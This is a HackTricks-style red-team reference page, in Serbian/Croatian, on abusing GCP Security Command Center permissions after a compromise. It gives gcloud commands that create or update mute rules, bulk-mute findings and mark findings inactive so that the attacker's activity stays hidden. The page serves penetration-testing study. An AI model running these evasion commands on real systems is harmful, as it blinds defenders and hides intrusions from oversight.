GCP - Bezbednost Post Eksploatacije

Reading time: 2 minutes

tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Bezbednost

Za više informacija pogledajte:

GCP - Security Enum

securitycenter.muteconfigs.create

Spriječite generisanje nalaza koji bi mogli otkriti napadača kreiranjem muteconfig:

bash
# Create Muteconfig
gcloud scc muteconfigs create my-mute-config --organization=123 --description="This is a test mute config" --filter="category=\"XSS_SCRIPTING\""

securitycenter.muteconfigs.update

Spriječite generisanje nalaza koji bi mogli otkriti napadača ažuriranjem muteconfig:

bash
# Update Muteconfig
gcloud scc muteconfigs update my-test-mute-config --organization=123 --description="This is a test mute config" --filter="category=\"XSS_SCRIPTING\""

securitycenter.findings.bulkMuteUpdate

Utišajte nalaze na osnovu filtera:

bash
# Mute based on a filter
gcloud scc findings bulk-mute --organization=929851756715 --filter="category=\"XSS_SCRIPTING\""

Pronađeni problemi koji su isključeni neće se pojaviti na SCC kontrolnoj tabli i izveštajima.

securitycenter.findings.setMute

Isključite pronalaze na osnovu izvora, pronalazaka...

bash
gcloud scc findings set-mute 789 --organization=organizations/123 --source=456 --mute=MUTED

securitycenter.findings.update

Ažurirajte nalaz da biste označili netačne informacije:

bash
gcloud scc findings update `myFinding` --organization=123456 --source=5678 --state=INACTIVE

tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks